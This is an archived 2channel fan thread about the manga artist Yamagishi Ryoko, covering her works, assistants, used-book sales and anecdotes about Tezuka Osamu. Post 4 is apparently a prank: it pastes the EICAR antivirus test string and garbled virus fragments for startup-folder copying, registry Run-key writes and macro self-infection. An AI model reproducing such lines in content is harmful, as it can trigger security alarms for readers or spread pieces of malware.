5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

〓山岸凉子 Part125〓

1 :花と名無しさん:2007/07/12(木) 20:15:50 ID:0tC1X2yS0
書籍情報誌ダ・ヴィンチにて連載中のテレプシコーラを中心に
山岸作品をマターリマターリ語りましょう。

◆テレプシコーラ10巻(第一部完結)発売中
◆ダ・ヴィンチではバレエ漫画ヴィリ連載中

前スレ
〓山岸凉子 Part124〓
http://anime2.2ch.net/test/read.cgi/gcomic/1182648113/

2 :花と名無しさん:2007/07/12(木) 20:16:53 ID:???0
<お約束>
●新スレ立てはレス番900を超えてから。
 立てる前に必ずこのスレで宣言してください。
 立てる人が出てこない場合は950を踏んだ人、お願いします。

●ここでのテレプシネタバレは解禁になりました。思う存分語るが良い。
 ネタバレが嫌なひとは発売日前後は見ないこと。
 それで火病られてもこちらでは対処しかねます。

●チャット厳禁。荒らしはスルー。

●自分語りや"うちの子"ネタはスレが荒れる元なので、自粛しましょう。
 作品にちなんだ物なら、私的経験談や関連知識の話でも、節度があれば楽しめます。
 ただし、それも長く続くとスレ違い気味になりますので気をつけましょう。

●誰かの発言に注意するときは、相手やまわりに受け容れられる表現で。
 何度も注意を重ねるのも逆効果です。スルーを基本に。

●過去ログも増えてきました。現行スレ以外でのガイシュツ話題は
 話題になった時期や検索キーワードも教えてあげる配慮をお願いします。

3 :花と名無しさん:2007/07/12(木) 20:19:19 ID:???0
<よくある質問>
●このスレにおいて「松井」とは舞あけみのことです。(in汐の声)

●作品中に出てくる「27円」とは3×9=「サンキュー」の意味です。(inゆうれい談)

●処天文庫版、氷室冴子さんとの対談の伏字は謎のまま。真実はご本人しかわからないでしょう。

●千花は死にました。

●テレプシ第二部はたぶん2007年秋開始予定です。
 予定は未定、伸びても泣くな。

4 :花と名無しさん:2007/07/12(木) 20:19:41 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/07/12(木) 20:22:11 ID:???0
山岸凉子(少女漫画@2ちゃんねる) 過去ログ (Part106まで)
http://storage0272.at.infoseek.co.jp/comic/yamagishi/yr/index.html

2ch DAT落ちスレ ミラー変換機 ver.4
http://www.geocities.jp/mirrorhenkan/

<関連スレ>
漫画板スレ
山岸凉子総合 その3
http://anime2.2ch.net/test/read.cgi/comic/1174256262/

懐かし漫画板スレ
日出処の天子 第二十九戦目
http://anime2.2ch.net/test/read.cgi/rcomic/1183170838/

ダンス板スレ
山岸バレエマンガを崇拝するところ[5巻目]
http://hobby9.2ch.net/test/read.cgi/dance/1160123242/

6 :花と名無しさん:2007/07/12(木) 20:24:01 ID:???0
〓山岸凉子 Part107〓
http://comic6.2ch.net/test/read.cgi/gcomic/1159077280/
〓山岸凉子 Part108〓
http://comic6.2ch.net/test/read.cgi/gcomic/1160218645/
〓山岸凉子 Part109〓
http://comic6.2ch.net/test/read.cgi/gcomic/1161501111/
〓山岸凉子 Part110〓
http://comic6.2ch.net/test/read.cgi/gcomic/1163162798/
〓山岸凉子 Part111〓
http://comic7.2ch.net/test/read.cgi/gcomic/1166875392/
〓山岸凉子 Part112〓
http://anime2.2ch.net/test/read.cgi/gcomic/1169656252/
〓山岸凉子 Part113〓
http://anime2.2ch.net/test/read.cgi/gcomic/1170490878/
〓山岸凉子 Part114〓
http://anime2.2ch.net/test/read.cgi/gcomic/1171272174/
〓山岸凉子 Part115〓
http://anime2.2ch.net/test/read.cgi/gcomic/1172340465/
〓山岸凉子 Part116〓
http://anime2.2ch.net/test/read.cgi/gcomic/1173416907/
〓山岸凉子 Part117〓
http://anime2.2ch.net/test/read.cgi/gcomic/1174131543/
〓山岸凉子 Part118〓
http://anime2.2ch.net/test/read.cgi/gcomic/1176049177/
〓山岸凉子 Part119〓
http://anime2.2ch.net/test/read.cgi/gcomic/1177476370/
〓山岸凉子 Part120〓
http://anime2.2ch.net/test/read.cgi/gcomic/1178771989/

7 :花と名無しさん:2007/07/12(木) 20:25:18 ID:???0
〓山岸凉子 Part121〓
http://anime2.2ch.net/test/read.cgi/gcomic/1179670616/
〓山岸凉子 Part122〓
http://anime2.2ch.net/test/read.cgi/gcomic/1181225779/
〓山岸凉子 Part123〓
http://anime2.2ch.net/test/read.cgi/gcomic/1181754499/

8 :花と名無しさん:2007/07/12(木) 20:26:35 ID:???0
ギシスレ5つの誓い

ひとつ、ネタバレを見ても泣かないこと!
ひとつ、自分を正当化しないこと!
ひとつ、逆上して火病らないこと!
ひとつ、過度な自分語りしないこと!
ひとつ、2chの中でルールを守って遊ぶこと!

大人ならおまいら守れよ

9 :花と名無しさん:2007/07/12(木) 21:37:04 ID:???0
    /⌒\  /⌒\
  ((    ; 三    ,,))
    ヽ   (  /    ミ   マラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラ・・・・・・・・・・
     キ   .メ   ./
     乂____ノ       -‐、
    / ̄.| | |  `‐-------´  /
   (──┘ |__|   ____   ヽ
    `ー─┬┬─ ´     丶-‐´
     .━━┷┷━━
    
   (⌒ヽ、                  (⌒ヽ、      
  (     )         , ⌒ヽ    (    )
  ゝ     ヽ      (    .'   (       ヽ⌒ヽ
(         )     ゝ    `ヽ(           )
 ゝ           `ヽ,(    (                `ヽ
(              )    )                 )  
                                       
           ( ・∀・)( ・∀・) <チンポヘリが愛を込めて>>1乙!!!!ノ~~^^~~~~~~~~~
〜〜〜〜〜〜〜| ̄〆 ̄ ̄ ̄ ̄ ̄ノ〜〜〜〜〜ヽ_ノ〜〜=〜〜〜〜〜〜ノ ̄ ̄
          ヾ〜〜〜〜〜〜ヾ                       〜〜〜〜

10 :花と名無しさん:2007/07/12(木) 21:37:23 ID:???O
トイレに>>1が〜



乙!


11 :花と名無しさん:2007/07/12(木) 23:20:08 ID:???0
前スレ
993 名前:花と名無しさん[sage] 投稿日:2007/07/12(木) 21:26:27 ID:???0
ギシ先生、「憲法改正について一言」は止めて下さいね。

何じゃこりゃー!
外国のゲージツカがリベラル気取って政治的発言することあるけど
んなのやってくれんでもいーよ。本業のジャマじゃん

12 :花と名無しさん:2007/07/12(木) 23:23:10 ID:???O
>>11
日本語でおk

13 :花と名無しさん:2007/07/12(木) 23:28:38 ID:???0
>>11を日本語にしてみると「テレプシ2部マダー?」となりました。

14 :花と名無しさん:2007/07/12(木) 23:58:02 ID:???0
>>1
残りレス数が少ない中、スレ立てありがとう。

15 :花と名無しさん:2007/07/13(金) 00:13:36 ID:???0
そういえば馬屋古の時は毛人は普通に存命だったな。

16 :花と名無しさん:2007/07/13(金) 00:19:46 ID:???O
一時期不倫ものや中年女性の苦悩ものが多かったけど、
あれって実体験なのかなってくらいリアル。
今回のビリの「指輪の日焼けの跡→バツイチ?」とかさ。


17 :花と名無しさん:2007/07/13(金) 00:26:00 ID:???0
リアルというか、いくつも書いてるけど全部一つの話って感じがするあたりが
実体験くさいよね。

18 :花と名無しさん:2007/07/13(金) 00:45:20 ID:???0
「二口女」のモデルは一条ゆ○り先生のような気がしてならない。

19 :花と名無しさん:2007/07/13(金) 00:56:15 ID:???0
御大ケコンしてたじゃん。

朱雀門に出てくるイラストレーターが、かなりリアルだし顔もギシせんせに似てるような気がしてならない。

20 :花と名無しさん:2007/07/13(金) 01:01:18 ID:???0
>>19
そっか。
売れっ子イラストレーター、派手な格好、偏食、しっかりした姪(しかも名前が紫)

なんかでそう思ってしまったのかも。

21 :花と名無しさん:2007/07/13(金) 01:17:51 ID:???0
>>12-13
解り肉化った?
漫画家が「政治活動なんかするな」
ってこと
せっかく才能もってるのに、そんなのヒマで平凡な人にまかせときゃいいの

22 :花と名無しさん:2007/07/13(金) 02:56:25 ID:???O
技師の勝手やん

23 :花と名無しさん:2007/07/13(金) 03:42:01 ID:???O
>>19 >>20
そういえば、似てら。
ギシセンセのヒントっぽい、「紫」って名前。

24 :花と名無しさん:2007/07/13(金) 03:46:43 ID:???O
アンカミスった。
二口女のイラストレーターが、一〇ゆかりセンセがモデルっぽい、
って言ってた人は>>18 >>20さんか。

25 :花と名無しさん:2007/07/13(金) 04:23:19 ID:???0
>>11
原発、中東派兵に触れてた頃は私もお花畑だったから
ふむふむwとか思ってたけど
9条にも何か言ってたわけ?
過去の例からいってヤッパ左寄り?

26 :花と名無しさん:2007/07/13(金) 09:07:41 ID:???O
>>19
ギシ先生、若い頃から着物にハマっていたのかな。
あの作品にあったように、お見合いでいっぱい作ったのがきっかけだったりしてw

27 :花と名無しさん:2007/07/13(金) 09:51:26 ID:???0
80年代の不倫関係物を量産してた頃の絵が好きだ。


28 :花と名無しさん:2007/07/13(金) 09:53:52 ID:???0
あの絵柄で江戸時代とか書いたら超ハマる。
地味すぎて、一般受けしないだろうけど。

29 :花と名無しさん:2007/07/13(金) 10:09:35 ID:???O
時代物いいね。細川ガラシャとか書いてほしい。
深夜にやってた「魔界転生」おもしろかったから。
ギシ先生のキリシタンもの(そんなジャンルねーか)見てみたい。
…けど、ギシ先生自体が、割と一貫した死生観とか持ってるみたいだから
確固とした宗教持ってる人の話は難しいかなー
三浦綾子の「塩狩峠」とかもギシ絵で読んでみたい
んで泣きたい

30 :花と名無しさん:2007/07/13(金) 10:59:54 ID:???0
>>29の「魔」の文字見ただけで
脳内に「パタリロ聖徳太子」が展開してしまった

31 :花と名無しさん:2007/07/13(金) 11:40:32 ID:???O
>>30
ドロッセル魔夜ー

32 :花と名無しさん:2007/07/13(金) 11:46:47 ID:???O
>>28
「神かくし」はすんごくよかったよー

33 :花と名無しさん:2007/07/13(金) 11:55:22 ID:???0
>>11
え?マジ発言なの?

今の時代ワンフレーズ発言するのは決してお利口じゃないんだけどな。
小泉並のセンスがあるなら別だが…
ギシ先生は描き込んでなんぼだよ。

ところで瀬戸内寂聴ってギシ的だよね。
光源氏発言で思ってしまった。
出家しても業から逃れるのは難しいもんだな。

34 :花と名無しさん:2007/07/13(金) 12:56:30 ID:???O
瀬戸内ジャクソンと一緒にしないでくれないか?

35 :花と名無しさん:2007/07/13(金) 13:00:00 ID:???0
>>34
山岸=瀬戸内という事じゃなく
山岸が描きそうなタイプという事。

36 :花と名無しさん:2007/07/13(金) 13:02:03 ID:???0
いつのまに新スレ。>>1乙なのれす!しかしテンプレの●千花は死にました。
が淡々としててワロスw

37 :花と名無しさん:2007/07/13(金) 13:32:27 ID:???O
ギシ先生の漫画にもミイラになってた尼さん(主人公のおばさん?)の話、あったね。
詳しく思い出せないけど…
何か高校くらいから、たまに煮詰まると、「あ〜出家したい」て思うんだけど(あさきゆめみし読んでたからその影響かと)、
出家したら、もう漫画なんて読めないよね?きっと。
とりあえず、口にすると楽になるから言っちゃうだけなんだけど。

38 :花と名無しさん:2007/07/13(金) 13:37:39 ID:???0
出家して世俗と縁を切っても
自分自身の煩悩から逃れるのは難しい

39 :花と名無しさん:2007/07/13(金) 14:03:07 ID:???O
出家したって何も良いことないよ。

40 :花と名無しさん:2007/07/13(金) 14:11:41 ID:???0
>>37
死者の家」だね。主人公の母親の叔母。

女が不幸な結婚をする家系で、その大叔母は若い頃に出家して
死後掘りかえしたらミイラになっていた。
なにかの因果で成仏出来てないんじゃないか?と。

あの主人公の髪型はどうかしてる。

41 :花と名無しさん:2007/07/13(金) 15:36:02 ID:???O
>>40
ありがとん「死者の家」か。題名が本当に思い出せないの多いなー
確かそれも不倫ものだったよね
俗世に未練やら執着やらとにかく念があってミイラ化した、て感覚はよくわからん
言い伝えみたいなもんかな

42 :花と名無しさん:2007/07/13(金) 15:51:39 ID:???0
>>41
「死者の家」の主人公は妻子がいるの隠されてたけどね
あっちは深刻な顔して言い出せなくて、妻とは別れるからだったけど
あ、ヴィリのレナ先生も同じパターンか
フランス男だから聞かなかったじゃない、おまいも楽しんだだろ だけど

43 :花と名無しさん:2007/07/13(金) 16:12:20 ID:???0
>>41
この世への未練が強いと焼き残るとか形が残るとか
そうゆう話は昔からあったような…
どこが出元だがわからんがオカルト界wではよく出る話題のような。

私の人形、にもこの概念入ってたと思う。

44 :花と名無しさん:2007/07/13(金) 21:00:02 ID:???0
ちょっとやせたらまぶたが千恵子さんみたいになってしまった

45 :花と名無しさん:2007/07/13(金) 22:56:39 ID:???0
山岸漫画一作品につき一人は必要なあの瞼。

46 :花と名無しさん:2007/07/14(土) 06:20:20 ID:???O
年のいったバレリーナって感じのまぶただよね
千花ちゃんが生きていたとしたら、華やかなおばさんになったろーなぁ

47 :花と名無しさん:2007/07/14(土) 14:10:45 ID:???O
レナ?

48 :花と名無しさん:2007/07/14(土) 14:18:51 ID:???O
既出かもしれんが今週号の週間文春で小林信彦が
クワスについて書いていたよ。すげー甘いんだって。
練習中にのんでたから炭酸入りミネラルウォーター
みたいなもんかと思ってました。


49 :花と名無しさん:2007/07/14(土) 14:29:33 ID:???O
ネタバレマダー?

50 :花と名無しさん:2007/07/14(土) 17:11:24 ID:???O
テレプシ再会マダー?

51 :花と名無しさん:2007/07/14(土) 18:46:01 ID:???0
       /⌒彡
     / 冫、 ))
    / ~ヽ ` , ((((  ティモテ
    | \ y  ))))   ティモテ〜
    |   ニつ))つ
    |、ー‐ < ((
    /   ヾ \、
  // しヽ__)〜
 ~〜〜〜`


52 :花と名無しさん:2007/07/14(土) 22:39:36 ID:???O
新連載マダー?

53 :花と名無しさん:2007/07/14(土) 23:21:48 ID:???0
>>51
レナ先生に似てる!

54 :花と名無しさん:2007/07/14(土) 23:38:41 ID:???O
図書館で読んだ、アラベスク二部がブクオフで上下巻200円で買えた…う、嬉しい〜
百円の文庫漫画コーナーはたまにお宝があるね
萩岩睦美の「小麦畑の三等星」まで揃ってたし…(買わなかったけど)
ギシ先生の漫画がまた増えて嬉しい(ギシ先生に還元できてないけどorz)

55 :花と名無しさん:2007/07/15(日) 00:27:17 ID:???0
五等星じゃなかった?

56 :花と名無しさん:2007/07/15(日) 00:34:44 ID:???O
>>55
百円だけど三等星だたよ

57 :花と名無しさん:2007/07/15(日) 00:37:50 ID:???0
ギシは漫画安売り反対の会(正式名称?)に入っています

58 :花と名無しさん:2007/07/15(日) 00:46:36 ID:???O
それマジネタ?
まあ自分もブコフは滅びて良いと思うが。

59 :花と名無しさん:2007/07/15(日) 00:52:45 ID:???0
マジ
名簿にギシ先生の名前があった

60 :花と名無しさん:2007/07/15(日) 01:33:55 ID:???O
その名簿はどこで見れるの?

61 :花と名無しさん:2007/07/15(日) 01:34:27 ID:???0
著作権でメシ食ってる人なら
ああいうもんに反対するのは真っ当な姿勢だろう

だが消費者側からすればあれは有難いのも事実

62 :花と名無しさん:2007/07/15(日) 02:17:09 ID:???O
版権で飯を食うのっていいよね〜。
一度それをやるとそれがやめられなくなるから未だに同じ漫画の
愛蔵版や文庫版やコンビニ本で重刷を繰り返すらしい。
ギシも同じ話いくつもに出してかなり版権料稼いでるよなw


ぶっちゃけ漫画家なんて原稿料だけで良いような気もするけどな。

63 :花と名無しさん:2007/07/15(日) 02:42:11 ID:???0
マジレスすると原稿料だけじゃお小遣いも出ないよ。
ほぼ人件費で消える。

64 :花と名無しさん:2007/07/15(日) 02:45:20 ID:???O
紙資源の節約という面ではブコフ貢献してるよな。
自分も正直ありがたい派。

65 :花と名無しさん:2007/07/15(日) 02:48:01 ID:???0
>>63
単行本でない漫画家はつらいらしいね。
材料とアシ代で連載してないときより貧乏になるとか・・・。

66 :花と名無しさん:2007/07/15(日) 02:57:28 ID:???0
>>60
自分は何年か前のジャンプで広告記事を見たんだけど
多分ジャンプ以外の漫画雑誌にも載ってたと思う
賛同する作家の名前がズラーッと並んでた
サイトがありそうだから探せば見れるんじゃないかな

67 :花と名無しさん:2007/07/15(日) 03:34:38 ID:???0
>>62
そういう特権階級は少数派だとオモ

>>65
某自称美人エロ漫画家(※中年)が文春だか新潮だったかのインタビューでアシスタント代稼ぐために酌婦やったみたいなこと嬉々として書いてて、
「おまい、そんなバイトしてる暇あったらアシスタント雇わずに自分でベタ塗りしろよ!」と思った記憶があるw

68 :花と名無しさん:2007/07/15(日) 04:35:44 ID:???0
結局ロリITだけがウマーな展開になってるヴィリ

本当にこれでいいのか?

69 :花と名無しさん:2007/07/15(日) 05:17:37 ID:???O
>>57
普通そう思うでしょ
ブックオフ賛成の作家だったら、そっちのほうが怖い

70 :花と名無しさん:2007/07/15(日) 09:42:49 ID:???0
>>68
そろそろITを許してやれよ

71 :花と名無しさん:2007/07/15(日) 09:59:19 ID:???O
>>63
マジレス返せばそもそも原稿料がそんなに安いのが問題なわけで。
きちんとした労働対価が与えられれば
著作権なんて不要なシステムだよ。

まあ自分はそれとは別にブコフはつぶれて欲しいけど。
普通の昔ながらの古本屋肯定派。

72 :花と名無しさん:2007/07/15(日) 10:34:41 ID:???O
>>67
でも、アシスタントは時間がないから手伝ってもらう場合だけじゃなく、
技術的に自分が描けなかったり、自分より上手いから頼むケースもあるらしい。
ギシ先生はどっちなのだろうか…

73 :花と名無しさん:2007/07/15(日) 10:48:30 ID:???0
>>72
年が年なので体力的にもたない

74 :花と名無しさん:2007/07/15(日) 10:53:12 ID:???O
料理とか建物はアシがいないと描けなそう。

75 :花と名無しさん:2007/07/15(日) 11:25:51 ID:???0
今の漫画家の低賃金は手塚治虫のせいで決まったって
何かで見たな。でも漫画を開拓したのも手塚先生だし。

それよりテレプシ書店で平積みされててうれしいな。
表紙がやはり美しい。ファンブックも出せ。

76 :花と名無しさん:2007/07/15(日) 11:35:28 ID:???O
>>75
それ漫画じゃなくてアニメじゃないか?

どっちにしろ漫画界はいい加減手塚の亡霊から離れた方がいいよ。
でも手塚の名前の入った賞をみんなありがたがるんだよね。

77 :花と名無しさん:2007/07/15(日) 11:38:11 ID:???0
>>75
それは漫画じゃなくアニメだと思う。
宮崎駿が批判の急先鋒だよ。

78 :花と名無しさん:2007/07/15(日) 11:56:46 ID:???0
そういや以前山岸さん独特の四角いフキダシは
「誰が描いても同じようになるから」が理由だと言ってたな

漫画家さんによるんだろうけど
ベテランになればなるほど
主役と主要な脇役数人しか本人が描かないケースもあるからなぁ






79 :花と名無しさん:2007/07/15(日) 11:56:50 ID:???0
漫画家さんってアシスタントさんとの人間関係も大変だと思うしね。
ベルセルクの作者は人間関係がなかなか築けないタイプらしくて
しかも絵があの通り拘り&緻密なために描く意欲があっても
なかなか連載が思うように進まないらしいし。
(休載中も兵隊ずっと描いてましたとか柱のコメントが哀しい。)
白絵だけどギシ先生のアシさんが長そうな事でほっとする。

80 :花と名無しさん:2007/07/15(日) 12:09:21 ID:???0
>>79
狭い部屋で何日も顔つき合わせて漫画カリカリ描いてりゃ
そりゃ人間関係も悪化すると思う…

山岸先生の白絵の人wは
処天でもモブ描いてる記憶があるんだよなー


81 :花と名無しさん:2007/07/15(日) 12:34:37 ID:???O
>>79
ベルセルクの絵柄を一人で描いてたら大変だろうな…

あと岩明均や沙村宏明も一人で描いてるらしい。
彼らは連載だと雑な部分がコミックスで直ってるから、作家的な職人気質があるんだろうなと思う。
連載に下書きを載せる事の是非は色々あるけど。



江川達也は無視。

82 :花と名無しさん:2007/07/15(日) 12:45:37 ID:???0
>>81
職人的で思い出したが
内田善美なんかはどうみても一人で描いてるように見えたな
というかあのレベルの作画にアシ入れられなかったのかもしれない

でも結局そういう作家さんって長持ちしないのかもな
やっぱどっかしら妥協出来る図太さがないと
長くは続けられない仕事かも

83 :花と名無しさん:2007/07/15(日) 12:47:42 ID:???0
どっかのマンガ誌は、マンガ書くところは全部自社ビルの中で、マンガ家もアシスタントもビルに通って書くという
よく考えりゃ普通の会社?みたいなやり方してるってあったな。
 世の中結局人間関係かと思うとなんだか落ち込むよ。



84 :花と名無しさん:2007/07/15(日) 12:54:47 ID:???0
弓月先生は手直ししないよ。
この作者はスレにトリップ付きで来るよ。

85 :花と名無しさん:2007/07/15(日) 12:57:01 ID:???O
>>82
燃えよペンにその手の話あったなあ。
漫画を過酷にやり込んだおかげで燃え尽きた
しかも妥協で描いた漫画の方が読者にウケたとか。

漫画家が芸術家じゃなくて量産システムだったら効率重視の方が長持ちするんだろうね。

86 :花と名無しさん:2007/07/15(日) 13:46:58 ID:???O
人間関係とか一人でとか読んでたらなんとなく厩戸が漫画描いてるところ想像した

87 :花と名無しさん:2007/07/15(日) 13:54:57 ID:???0
>>86
時々は毛人がアシストに来るんだろう

88 :花と名無しさん:2007/07/15(日) 13:56:59 ID:???0
そして別の漫画家フッツーのところへ
通ってる担当のエミシを思って
原稿の上にポツっと涙

89 :花と名無しさん:2007/07/15(日) 14:21:11 ID:???O
ギシ作品の独身イラストレーター物でも、担当が恋愛対象になっていたよね。
どれも妹や姪に奪われて実らなかったけどw

90 :花と名無しさん:2007/07/15(日) 14:25:42 ID:???O
担当さんと結婚ってよくあるよね
会社は社内婚が多い
人間結局結婚もどういう社会生活するかの結果なんだな

>>76-77
マンガも、手塚先生がとても安く受けていたことが
業界基準が固まる時期に判断材料の一つになった影響が
残ってると聞いたよ。

91 :花と名無しさん:2007/07/15(日) 15:13:18 ID:???0
手塚先生は高くすると依頼してもらえなくなるから安くしてたんだよ。
嫉妬深い面もよく見せたというし、神様も結局漫画を愛する漫画バカの1人
だったんだね。

92 :花と名無しさん:2007/07/15(日) 15:15:27 ID:???0
>>86調子麻呂は飯スタント&ペットの世話(馬)係&雑用

93 :花と名無しさん:2007/07/15(日) 15:54:23 ID:???0
>>91

石森に嫉妬したんだよね?

94 :花と名無しさん:2007/07/15(日) 15:55:58 ID:???0
>>91
30過ぎても目が出ない漫画家志望女性の親が
その道諦めさせるため懇願して会わせたら
なんだか優しい言葉かけられてしまって、
希望を持った女性は食費も削って更にのめり込んで…
結局餓死しちゃったとかもあったな。

随分前読売で記事になってた…
暗に「神様(崇拝)」への批判が入ってたけど、今後再評価かかるんじゃないかな。

95 :花と名無しさん:2007/07/15(日) 16:04:06 ID:???0
>>93
手塚が○○の才能に嫉妬して××と言った、ってのは
もはや都市伝説みたいなもんで
色んなバリエーションがあるんだよなw

もしかしたら本当に全部言ってたのかも知れないが、
自分が知ってるだけでも大友・水木・あとは浦沢かな

96 :花と名無しさん:2007/07/15(日) 16:17:50 ID:???0
>>95
93ではないが、石森に関しては手塚追悼本の中で石森自身が描いてた
映画的実験手法を使ってみたら、尊敬する御大に手酷く批判されて
落ち込んでいたが後に謝罪を受けた、ってくだり
神様でも嫉妬するんだ・・・、っぽい事が描かれてたように思う

97 :花と名無しさん:2007/07/15(日) 16:18:25 ID:9q3iMfNl0
>>94
これこそ都市伝説と思いたい((((;゚Д゚))))

手塚治虫が少年誌に持ち込みして云々の話もあるじゃん
そのころリアル消防だったので
手塚ツマンネとか思ってたんで 合掌


98 :花と名無しさん:2007/07/15(日) 16:19:01 ID:???0
見開き真っ白だったか
見開き真っ黒のページに女の子がぽつんと佇んでいる絵だったか

99 :花と名無しさん:2007/07/15(日) 16:48:50 ID:???O
>>95
浦沢は聞いたことないな〜。
手塚が生きてる頃もうデビューしてたっけ?


石ノ森と大友は確かに聞いたことあるけど。

100 :花と名無しさん:2007/07/15(日) 17:02:32 ID:???0
>>96
逆に、石森の被害妄想や自己賛美という気も。

101 :花と名無しさん:2007/07/15(日) 17:06:31 ID:???O
竹宮恵子説もある、要はその時、第一線にいる人全員ライバル視してたんじゃ。
でも一番激烈な反応だったのは大友だったと思う。

ところで98が妙に怖い。

102 :花と名無しさん:2007/07/15(日) 17:24:33 ID:???0
自分が聞いたパターンは、ファンの子が手塚に
「私は手塚先生と石森先生の漫画がどっちも大好きです」みたいな無邪気なファンレターを書いたところが、
なんと手塚神からその子に返信(昭和初期は漫画雑誌に漫画家の住所が「ファンレターの宛先」として書かれていたそうな)。

ところがその内容というのが石森を糞ミソに侮辱して石森漫画なんか読む価値無してな内容。
受け取ったその子はどっちかというと石森>手塚だったのでその手紙を石森に直接チクッた。
んで流石にショックをうけた石森が手塚に証拠つきで詰寄ったところ、神は罪を認めて謝罪した・・・という話。


あと宮崎駿にも嫉妬がらみのイザコザあったらしい。
神が胃癌で亡くなったのは胃にイライラ相当たまってたのではないかと。

103 :花と名無しさん:2007/07/15(日) 17:26:21 ID:9q3iMfNl0
話はおもしろいんだが
昭和初期ってのはちょっとどうかと思う

104 :花と名無しさん:2007/07/15(日) 17:27:43 ID:???0
ごめん
昭和初期っていっても昭和40年代ですかね

105 :花と名無しさん:2007/07/15(日) 17:33:12 ID:???0
まぁこういう数々の伝説があるがゆえに「神」なんだろうなぁ
あれだけの世間的評価を得ながらも
死ぬまで新しい才能に嫉妬する生々しさ含めてさ

逆に萩尾望都さんは
「他人の才能に嫉妬する」ということが理解出来ないつってたな…
自分にない才能を見るとどんな漫画描いてくれるかwktkするそうだ

106 :花と名無しさん:2007/07/15(日) 17:34:09 ID:BnwN9VoL0
昭和って何年あんだよwww

107 :花と名無しさん:2007/07/15(日) 17:36:53 ID:???O
>>105
神と女神の差かな。
個人的に山岸先生も女神だが、負の女神。
萩尾先生はニギミタマ、山岸先生はアラミタマな感じ。
あと楳図先生が祟り神。

108 :花と名無しさん:2007/07/15(日) 17:39:43 ID:???0
>>106スマソ 単純なミスだから虐めんでくれorz

手塚石森騒動はガチっぽいですね
これの下のほうに出てる
http://takekuma.cocolog-nifty.com/blog/2006/06/post_b253.html

109 :花と名無しさん:2007/07/15(日) 17:46:09 ID:???0
>>97
これは実話だよ。
親が取材受けてたし女性の漫画も一部載ってた。

110 :花と名無しさん:2007/07/15(日) 17:50:39 ID:???0
手塚神の、天才性と裏表のような非常識さの
逸話はけっこうあるというから。
夢中になって、アシさん達の体力なんて全然考慮しないで働かせて、
でもねぎらう時も自腹をうんと裂いてもねぎらうみたいなのとか。

111 :花と名無しさん:2007/07/15(日) 18:05:19 ID:???O
>>110 ちょっとニジンスキーを思い出した。
山岸漫画の主人公的な天才かもね

112 :花と名無しさん:2007/07/15(日) 18:09:02 ID:???0
今なら就職して自分でHP作って、そこで自作漫画発表するという手段もあるわけで
面白くて評判がたてばプロとしての未来も開けるだろうし、
ツマンネで無視されれば「自分には才能がない」とプロ断念・でも漫画製作は趣味で続けられる
だろうし

やわらか戦車の成功もあることだしね


113 :花と名無しさん:2007/07/15(日) 18:42:35 ID:???O
>>112
昔から同人誌とかあったよ〜

114 :花と名無しさん:2007/07/15(日) 19:19:18 ID:???O
>>109
かわいそうだね。
漫画家どうのじゃなくて「ある目的」があって
執着しすぎて命を落とした人の例って感じ。

115 :花と名無しさん:2007/07/15(日) 19:20:02 ID:???0
>>113
その亡くなった方は職業漫画家になりたかったんじゃないか?

でも才能がない自分に見切りをつけ
別の道を模索出来るほど器用でもなかった、か…
なんか誰かを思いだす話だな

あーでも千花ちゃん才能はあったか

116 :花と名無しさん:2007/07/15(日) 20:11:20 ID:???0
チェーホフの「かもめ」みたいな悲劇だな
手塚神もキッパリ「あんたにゃー才能がない むりぽ」と言ってやればいいのに
・・・ひょっとしてある意味スタイリストな神は『引導渡して恨まれる』という損な役を引き受けたくなかったのでは

117 :花と名無しさん:2007/07/15(日) 20:27:16 ID:???0
>>114-116
私がこれを忘れられないのは
まさに山岸っぽかったなぁ、としょっちゅう思い出してるから…

女性はほとんどニート状態で社会派漫画を描こうとしてたみたい。
二昔前以上(当時)のガロっぽい作風だった。
手塚先生は「世の中をもっと見詰めれば道は開ける」
みたいなアドバイスしてたと思う。

「まず社会に出て世間を知りなさい」って言ってやれよ、と。
神様と信者の凸凹が最悪の状態ではまってしまった感じ。

118 :花と名無しさん:2007/07/15(日) 20:27:28 ID:???O
担ぎ出された神もいい迷惑だし、
まさかそんな結果になるとは思わず当たり障りのないこと言ったんだろう。

119 :花と名無しさん:2007/07/15(日) 20:31:30 ID:???O
>>116
でも他人(手塚)のせいじゃないさ
その人のことはその人が決めるべきさ

120 :花と名無しさん:2007/07/15(日) 20:33:51 ID:???O
>>94
餓死するまで書いた漫画ってすごいね…
気分が高揚してるとお腹がすかないときってあるけど、ずっとそんな感じだったんかなあ
それはそれで彼女にとっては、至福の時間だったようにも思える
壮絶だけど悲惨ではないというか。
ゆるやかな自殺という感じではないよね。
その人の書いた漫画読んでみたい。
ゴッホ展行ったとき、こんなに揺さぶられる絵を描く人が生前はほとんど、
評価されなかったなんて(・c_・`) …と切なく思ったけど、
亡くなっても何の評価を受けてない人だって多く、
それは私が単に知らないんだ、て思ったら悲惨ばかりと思ってたゴッホ
(エキセントリックな感じはちょと怖いけど)への見方が変わったんだよね
後世に名を残したことってやっぱり大変な偉業だなあと
そりゃ生きてるうちに認められたかったとは思うけど…
芸術とか、本当よく分からないから、素人考えだけど。

121 :花と名無しさん:2007/07/15(日) 20:59:18 ID:???O
>>117
なんかギシ先生の見方も違うんだよね人によって
私にとってはメジャーなエンターテイナーで
深刻なことも一歩離れて美しくあるいは
